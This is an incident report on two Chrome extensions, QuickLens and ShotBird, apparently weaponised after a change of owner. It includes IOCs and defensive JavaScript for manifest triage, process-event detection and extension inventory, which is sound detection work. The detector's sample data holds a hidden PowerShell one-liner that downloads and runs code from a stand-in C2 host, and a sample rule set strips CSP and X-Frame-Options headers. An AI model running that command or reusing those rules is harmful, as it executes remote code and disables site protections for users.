Full Report
Two Google Chrome extensions have turned malicious after what appears to be a case of ownership transfer, offering attackers a way to push malware to downstream customers, inject arbitrary code, and harvest sensitive data. The extensions in question, both originally associated with a developer named "[email protected]" (BuildMelon), are listed below - QuickLens - Search Screen with
Analysis Summary
# Incident Report: Malicious Chrome Extension Ownership Transfers
## Executive Summary
Two legitimate Google Chrome extensions, QuickLens and ShotBird, were repurposed as malware delivery vehicles after ownership was transferred to a malicious actor. Post-transfer updates added code that strips security response headers (CSP, `X-Frame-Options`) from visited sites, loads remote JavaScript from a C2 server, and presents "ClickFix"-style social-engineering prompts that get the user to run host-level malware themselves. The incident exposed approximately 7,800 users to potential theft of sensitive data, including credentials and financial information.
## Incident Details
- **Discovery Date:** February 2026
- **Incident Date:** October 2025 (Initial listing for sale) – February 2026 (Malicious updates)
- **Affected Organization:** Downstream users of QuickLens and ShotBird extensions
- **Sector:** Information Technology / Consumer Software
- **Geography:** Global
## Timeline of Events
### Initial Access
- **Date/Time:** October 11, 2025 (QuickLens listed for sale); January–February 2026 (Ownership transfers).
- **Vector:** Supply Chain / Ownership Transfer.
- **Details:** The original developer (akshayanuonline[at]gmail.com) transferred ownership of QuickLens to "support[at]doodlebuggle[.]top" and ShotBird to "loraprice198865[at]gmail.com."
### Lateral Movement
- **Extension-to-Host:** The compromised extensions displayed fake "Update" prompts that instructed victims to paste and run a command, moving the attacker from the browser sandbox to the victim's operating system. No browser vulnerability was exploited; the user executes the payload on the attacker's behalf.
### Data Exfiltration/Impact
- **Credential Harvesting:** Captured data from HTML input fields (passwords, PINs, card details).
- **Host Compromise:** Execution of `googleupdate.exe` via PowerShell.
- **Browser Data Theft:** Siphoning of browsing history, stored passwords, and extension tokens.
### Detection & Response
- **Detection:** Identified by researchers at Annex Security (John Tuckner) and monxresearch-sec.
- **Response Actions:** QuickLens was removed from the Chrome Web Store; security researchers published technical breakdowns of the C2 communication and "ClickFix" mechanics.
## Attack Methodology
- **Initial Access:** Acquisition of legitimate browser extensions via secondary markets (ExtensionHub).
- **Persistence:** Malicious JavaScript fetched from the C2 was written to extension-accessible local storage and re-executed on every page load, so it survived restarts without appearing in the packaged extension files.
- **Defense Evasion:** Stripping of `X-Frame-Options` and CSP headers from responses; payload JavaScript delivered as the `onload` handler of an injected 1x1 GIF or via direct callbacks, so static analysis of the extension package never sees the malicious logic.
- **Credential Access:** Attaching listeners to form fields (`input`, `textarea`, `select`) to capture values as they are typed or submitted, including passwords, PINs and card details.
- **Discovery:** Fingerprinting user geography, browser type, and operating system.
- **Lateral Movement:** Pivoting to host-side execution via social engineering ("ClickFix" prompts).
- **Collection:** Harvesting local browser databases (history, sessions).
- **Exfiltration:** Collected data sent to external C2 servers; the extension also polled the C2 every five minutes for new instructions and payloads.
- **Impact:** Full host compromise and sensitive data exposure.
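The persistence and defense-evasion items above describe capabilities that are visible in an extension package even when the payload itself is fetched at runtime: broad host access, a content script matched against every origin, and `declarativeNetRequest` rules that remove security headers. The following is an added example (not code from the report or from either extension) of a static triage pass over an unpacked Manifest V3 extension. The manifest and rule set are constructed samples that model the behaviour; the permission and header lists are the author's choices, not a list taken from the page.

```javascript
// Added example, not code from the original report or from either extension.
// Static triage of an unpacked Chrome extension (Manifest V3) for two of the
// capabilities described above: code that runs on every page, and
// declarativeNetRequest rules that strip response security headers.
// SAMPLE_MANIFEST and SAMPLE_RULESETS are constructed samples, not the real files.

const SECURITY_HEADERS = new Set([
  "content-security-policy",
  "content-security-policy-report-only",
  "x-frame-options",
  "x-content-type-options",
  "strict-transport-security",
]);

// Permissions that let an extension rewrite responses or inject code at will.
const RISKY_PERMISSIONS = new Set([
  "declarativeNetRequest",
  "declarativeNetRequestWithHostAccess",
  "webRequest",
  "webRequestBlocking",
  "scripting",
]);

// <all_urls>, *://*/ and http(s)://*/ all mean "every site".
const isBroadMatch = (pattern) =>
  pattern === "<all_urls>" || /^(\*|https?):\/\/\*\//.test(pattern);

// manifest: parsed manifest.json; rulesets: { <ruleset id>: [rule, ...] },
// i.e. the JSON files referenced by declarative_net_request.rule_resources.
function triageExtension(manifest, rulesets) {
  const findings = [];

  const perms = [...(manifest.permissions ?? []), ...(manifest.optional_permissions ?? [])];
  for (const p of perms) {
    if (RISKY_PERMISSIONS.has(p)) findings.push({ type: "permission", detail: p });
  }

  const hosts = manifest.host_permissions ?? [];
  if (hosts.some(isBroadMatch)) {
    findings.push({ type: "host_permissions", detail: hosts.join(" ") });
  }

  // A content script matched against every origin is what "executed on
  // every page load" looks like in the manifest.
  for (const cs of manifest.content_scripts ?? []) {
    if ((cs.matches ?? []).some(isBroadMatch)) {
      findings.push({ type: "content_script", detail: (cs.js ?? []).join(" ") });
    }
  }

  // modifyHeaders rules that remove or overwrite a security header are the
  // header-stripping primitive; "append" cannot relax CSP, so it is ignored.
  for (const [name, rules] of Object.entries(rulesets)) {
    for (const rule of rules) {
      if (rule.action?.type !== "modifyHeaders") continue;
      for (const h of rule.action.responseHeaders ?? []) {
        const header = String(h.header).toLowerCase();
        if (SECURITY_HEADERS.has(header) && (h.operation === "remove" || h.operation === "set")) {
          findings.push({
            type: "header_strip",
            detail: `${name}#${rule.id}: ${h.operation} ${header} for ${rule.condition?.urlFilter ?? "*"}`,
          });
        }
      }
    }
  }
  return findings;
}

// Constructed sample modelled on the behaviour described in the report.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "Sample Screenshot Tool",
  version: "2.1.0",
  permissions: ["storage", "activeTab", "declarativeNetRequestWithHostAccess", "scripting"],
  host_permissions: ["<all_urls>"],
  content_scripts: [{ matches: ["<all_urls>"], js: ["content.js"], run_at: "document_start" }],
  declarative_net_request: { rule_resources: [{ id: "rules", enabled: true, path: "rules.json" }] },
};

const SAMPLE_RULESETS = {
  rules: [
    {
      id: 1,
      priority: 1,
      action: {
        type: "modifyHeaders",
        responseHeaders: [
          { header: "Content-Security-Policy", operation: "remove" },
          { header: "X-Frame-Options", operation: "remove" },
          { header: "Cache-Control", operation: "set", value: "no-store" },
        ],
      },
      condition: { urlFilter: "*", resourceTypes: ["main_frame", "sub_frame"] },
    },
  ],
};

function triageSample() {
  return triageExtension(SAMPLE_MANIFEST, SAMPLE_RULESETS);
}

for (const f of triageSample()) console.log(`[${f.type}] ${f.detail}`);
```

Run it against a real unpacked extension by parsing `manifest.json` and each file listed under `declarative_net_request.rule_resources`. A finding here is a capability, not proof of malice; a legitimate extension may also remove CSP on a handful of hosts, so the `urlFilter` in the detail is what separates a targeted fix from a wildcard strip.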
## Impact Assessment
- **Financial:** High risk of credit card and banking credential theft.
- **Data Breach:** Exposure of personal identifiers, government IDs, and login tokens for 7,800+ users.
- **Operational:** Browser security controls (CSP, framing protections) silently disabled on visited sites; unauthorized command execution on Windows hosts.
- **Reputational:** Damage to the "Featured" extension badge program and developer trust.
## Indicators of Compromise
- **Network indicators:**
  - doodlebuggle[.]top
  - Extension traffic to C2 servers that return JavaScript payloads and are polled on a fixed interval.
- **File indicators:**
  - `googleupdate.exe` dropped by the ClickFix command. The name collides with Google's legitimate updater, which runs from `C:\Program Files (x86)\Google\Update\`; treat the name as an indicator only when the binary runs from a user-writable location (Temp, AppData, Downloads) or is spawned by PowerShell.
- **Extension IDs:**
  - `kdenlnncndfnhkognokgfpabgkgehodd` (QuickLens)
  - `gengfhhkjekmlejbhmmopegofnoifnjp` (ShotBird)
- **Behavioral indicators:**
  - Unexpected Windows Run dialog prompts, typically framed as a browser or extension "update".
  - PowerShell commands pasted into the Run dialog, `cmd.exe`, or a terminal following instructions shown on a web page (the resulting PowerShell process is a child of `explorer.exe`, not of the browser).
  - Security response headers (CSP, `X-Frame-Options`) missing inside the browser while the server still sends them.
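The behavioral indicators above translate into two process-creation checks: a scripting interpreter launched from `explorer.exe` (the Run dialog) with a command line that hides its window, decodes itself, or downloads-and-evaluates; and a binary named `googleupdate.exe` running from anywhere other than Google's updater directory. The following is an added example (not from the report) of that logic run over constructed Sysmon Event ID 1 style records; the field names follow Sysmon's ProcessCreate schema, the values and the `c2.example` host are invented for the example, and the suspicious-argument patterns are the author's choice.

```javascript
// Added example, not code from the original report. Detection logic for the
// browser-to-host step: a ClickFix lure has the victim paste a command into the
// Win+R Run dialog, so the resulting PowerShell is a child of explorer.exe, not
// of the browser, and the dropped googleupdate.exe shares its name with Google's
// real updater. SAMPLE_EVENTS are constructed Sysmon Event ID 1 style records.

const INTERPRETERS = new Set(["powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"]);

// Command-line traits typical of a pasted ClickFix one-liner.
const SUSPICIOUS_CMD = [
  /-w(?:indowstyle)?\s+h(?:idden)?\b/i,                        // hidden window
  /-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}/i,            // base64 -EncodedCommand
  /\b(?:iex|invoke-expression)\b/i,                            // run downloaded text
  /\b(?:invoke-webrequest|iwr|downloadstring|downloadfile|start-bitstransfer)\b/i,
];

// Where Google's own updater lives; anything else named googleupdate.exe is suspect.
const LEGIT_UPDATER_DIRS = [
  "c:\\program files (x86)\\google\\update\\",
  "c:\\program files\\google\\update\\",
];

const basename = (p) => String(p ?? "").split(/[\\/]/).pop().toLowerCase();

// events: array of { ProcessId, Image, ParentImage, CommandLine, User }
function analyzeProcessEvents(events) {
  const alerts = [];
  for (const e of events) {
    const image = basename(e.Image);
    const parent = basename(e.ParentImage);
    const cmd = e.CommandLine ?? "";

    // Interpreter launched from the shell (Run dialog) with ClickFix traits.
    if (parent === "explorer.exe" && INTERPRETERS.has(image)) {
      const hits = SUSPICIOUS_CMD.filter((re) => re.test(cmd));
      if (hits.length > 0) {
        alerts.push({ rule: "clickfix_run_dialog", pid: e.ProcessId, traits: hits.length, detail: cmd });
      }
    }

    // googleupdate.exe outside the legitimate updater directory; a PowerShell
    // parent raises confidence because that is the ClickFix drop path.
    if (image === "googleupdate.exe") {
      const lower = String(e.Image).toLowerCase();
      const legit = LEGIT_UPDATER_DIRS.some((d) => lower.startsWith(d));
      if (!legit) {
        alerts.push({
          rule: "updater_impersonation",
          pid: e.ProcessId,
          traits: INTERPRETERS.has(parent) ? 2 : 1,
          detail: `${e.Image} spawned by ${parent}`,
        });
      }
    }
  }
  return alerts;
}

// Constructed sample: one ClickFix paste, its dropped binary, the real
// updater service, and a benign admin script launched from the shell.
const SAMPLE_EVENTS = [
  {
    ProcessId: 4120, User: "CORP\\alice",
    ParentImage: String.raw`C:\Windows\explorer.exe`,
    Image: String.raw`C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`,
    CommandLine: String.raw`powershell -w hidden -c "iex (New-Object Net.WebClient).DownloadString('http://c2.example/u')"`,
  },
  {
    ProcessId: 4188, User: "CORP\\alice",
    ParentImage: String.raw`C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`,
    Image: String.raw`C:\Users\alice\AppData\Local\Temp\googleupdate.exe`,
    CommandLine: String.raw`"C:\Users\alice\AppData\Local\Temp\googleupdate.exe" /silent`,
  },
  {
    ProcessId: 1902, User: "NT AUTHORITY\\SYSTEM",
    ParentImage: String.raw`C:\Windows\System32\services.exe`,
    Image: String.raw`C:\Program Files (x86)\Google\Update\GoogleUpdate.exe`,
    CommandLine: String.raw`"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc`,
  },
  {
    ProcessId: 5010, User: "CORP\\bob",
    ParentImage: String.raw`C:\Windows\explorer.exe`,
    Image: String.raw`C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`,
    CommandLine: String.raw`powershell -NoProfile -File C:\scripts\backup.ps1`,
  },
];

function analyzeSample() {
  return analyzeProcessEvents(SAMPLE_EVENTS);
}

for (const a of analyzeSample()) console.log(`[${a.rule}] pid=${a.pid} traits=${a.traits} ${a.detail}`);
```

The fourth sample event shows why the parent/child pair alone is not enough: users legitimately start PowerShell from the Run dialog, so the rule requires at least one ClickFix trait on the command line. Conversely the real updater is excluded by path, not by name, which is the distinction the `googleupdate.exe` indicator needs.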
## Response Actions
- **Containment:** Removal of QuickLens from the Chrome Web Store.
- **Eradication:** Reporting of malicious developer accounts to Google.
- **Recovery:** Public disclosure of the research to prompt manual uninstallation by remaining ShotBird users.
## Lessons Learned
- **Supply Chain Risks:** Legitimate extensions with "Featured" badges can be sold to untrusted parties without notifying the user base.
- **Detection Gaps:** Static analysis of extension source files is insufficient when payloads are delivered dynamically from a C2 into local storage.
- **User Training:** "ClickFix" social engineering remains highly effective because it does not break browser-host isolation; it persuades the user to cross that boundary by hand.
## Recommendations
- **Inventory Management:** Corporate IT departments should inventory installed browser extensions and allowlist only those from verified, enterprise-ready developers, enforced through the Chrome `ExtensionInstallAllowlist` / `ExtensionInstallBlocklist` policies rather than user discretion.
- **Policy Enforcement:** Constrain what a pasted command can do instead of keying only on the browser as parent: the ClickFix chain launches PowerShell from `explorer.exe` via the Run dialog, so rules scoped to browser-initiated processes miss it. Use GPO with AppLocker or WDAC to restrict PowerShell for standard users, disable the Run dialog where feasible, and alert on `explorer.exe` spawning PowerShell with hidden-window or encoded-command arguments.
- **Monitoring:** Header stripping by an extension happens inside the browser after the response arrives, so a network proxy or IDS still sees intact CSP and `X-Frame-Options` headers. Detect it from the extension side: audit installed extensions for `declarativeNetRequest` / `webRequest` permissions and `modifyHeaders` rules, and compare headers observed by an in-browser tool against what the server actually sends.
- **Caution on Ownership:** Treat developer or publisher changes in Chrome Web Store listings as high-risk events; pin known-good versions and re-review an extension whenever its publisher or permission set changes.
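The inventory recommendation above is mechanical enough to script. Chrome keeps installed-extension records in each profile's `Secure Preferences` JSON (on Windows under `%LOCALAPPDATA%\Google\Chrome\User Data\<profile>\`); the following is an added example (not from the report) that walks that structure, flags the two incident extension IDs plus any extension with broad host access or not installed from the Web Store, and emits the matching enterprise policy fragment. The field layout assumed here (`extensions.settings.<id>.manifest`, `state`, `from_webstore`; `state` 1 meaning enabled) is the author's understanding of Chrome's preference file and should be checked against the version in use; the preferences object is a constructed sample.

```javascript
// Added example, not code from the original report. Inventory of installed
// Chrome extensions from a profile's "Secure Preferences" JSON, flagging the two
// incident extension IDs plus risky traits, and building the policy that blocks
// them. Field names and the meaning of `state` are assumptions about Chrome's
// preference layout; SAMPLE_PREFS is constructed, not a real profile.

const IOC_EXTENSION_IDS = new Map([
  ["kdenlnncndfnhkognokgfpabgkgehodd", "QuickLens"],
  ["gengfhhkjekmlejbhmmopegofnoifnjp", "ShotBird"],
]);

const isBroadHost = (p) => p === "<all_urls>" || /^(\*|https?):\/\/\*\//.test(p);

// prefs: parsed "Secure Preferences" (or "Preferences") JSON for one profile.
function inventoryExtensions(prefs) {
  const settings = prefs?.extensions?.settings ?? {};
  const rows = [];
  for (const [id, entry] of Object.entries(settings)) {
    const m = entry.manifest ?? {};
    const flags = [];
    if (IOC_EXTENSION_IDS.has(id)) flags.push(`ioc:${IOC_EXTENSION_IDS.get(id)}`);
    if (entry.from_webstore === false) flags.push("not_from_webstore");
    if ((m.host_permissions ?? []).some(isBroadHost)) flags.push("all_urls_host_access");
    rows.push({
      id,
      name: m.name ?? "(unknown)",
      version: m.version ?? "?",
      enabled: entry.state === 1, // assumption: 1 = enabled, 0 = disabled
      flags,
    });
  }
  return rows;
}

// Chrome enterprise policy fragment. With no reviewed allowlist it blocks just
// the incident IDs; with one, it blocks everything ("*") except the allowlist.
// Applied via the registry (Windows), managed preferences (macOS) or
// /etc/opt/chrome/policies/managed/*.json (Linux).
function buildPolicy(allowedIds = []) {
  return {
    ExtensionInstallBlocklist: allowedIds.length ? ["*"] : [...IOC_EXTENSION_IDS.keys()],
    ExtensionInstallAllowlist: allowedIds,
  };
}

// Constructed sample: the QuickLens ID, a benign store extension scoped to one
// domain, and a sideloaded extension (names/versions invented).
const SAMPLE_PREFS = {
  extensions: {
    settings: {
      kdenlnncndfnhkognokgfpabgkgehodd: {
        state: 1,
        from_webstore: true,
        manifest: { name: "QuickLens", version: "1.0.0", host_permissions: ["<all_urls>"] },
      },
      [ "a".repeat(32) ]: {
        state: 1,
        from_webstore: true,
        manifest: { name: "Sample Ticket Helper", version: "3.2.1", host_permissions: ["https://*.example.com/*"] },
      },
      [ "b".repeat(32) ]: {
        state: 0,
        from_webstore: false,
        manifest: { name: "Sideloaded Tool", version: "0.1" },
      },
    },
  },
};

// Rows with at least one flag are what an analyst needs to act on.
function auditSample() {
  return inventoryExtensions(SAMPLE_PREFS).filter((r) => r.flags.length > 0);
}

for (const r of auditSample()) console.log(`${r.id} ${r.name}@${r.version} enabled=${r.enabled} ${r.flags.join(",")}`);
console.log(JSON.stringify(buildPolicy(), null, 2));
```

To run it fleet-wide, feed each profile's file through `inventoryExtensions` and ship the flagged rows to your SIEM; the policy object is the same shape whether it ends up in a JSON policy file or is translated into registry values.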